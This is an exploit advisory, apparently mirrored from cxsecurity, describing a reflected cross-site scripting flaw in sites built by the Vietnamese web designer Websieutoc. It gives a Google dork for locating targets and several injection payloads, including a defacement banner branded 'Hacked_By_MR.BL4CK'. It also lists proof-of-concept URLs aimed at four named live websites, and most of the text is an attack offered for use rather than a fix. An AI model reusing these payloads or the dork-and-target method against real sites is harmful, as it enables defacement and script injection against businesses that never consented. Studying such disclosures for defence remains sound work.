DUPLICATED https://cxsecurity.com/issue/WLB-2015120294 ######################################################## # Exploit Title: Design by Websieutoc Cross Site Scripting Vulnerability ######################################################## # Google Dork: intext:"Thiết kế web, Quảng cáo google bởi DMV" # Date: [28/12/2015] # Exploit Author: Gray Hat Group=>MR.BL4CK # Vendor Homepage: [http://websieutoc.vn/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.The First Enter The Dork In Google And Open The Target. # Then test for this vulnerability You must Test scripts in After Id Number. # for example These scripts: # 1-[<script>alert('XSS')</script> # 2-["><marquee><h1>Hacked_By_MR.BL4CK_forum.gray-hg.ir</h1></marquee>] # 3-[<marquee%20behavior="alternate">Hacked_By_MR.BL4CK<b>] # Poc: # http://thicongdien.com.vn/?madanhmucsanpham=2"><marquee><h1>Hacked_By_MR.BL4CK_forum.gray-hg.ir</h1></marquee> # GooD LucK ######################################################## # Demo: # http://thicongdien.com.vn/?madanhmucsanpham=2%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://www.diennongthontv.com/?madanhmucsanpham=19%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://www.cophankythuatdongphuong.com/?madanhmucsanpham=2%3Ch1%3ETest%3C/h1%3E # http://nhuavosong.com/?madanhmucsanpham=11%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : Bl4ck W4rning | Dalghak | MR.BL4CK | WHITE | H!dden V!rus | Shayan 72 | Keian | Ahriman | MR.ROBOT # We Are Gray Hat Hackers # Discovered By:MR.BL4CK ########################################################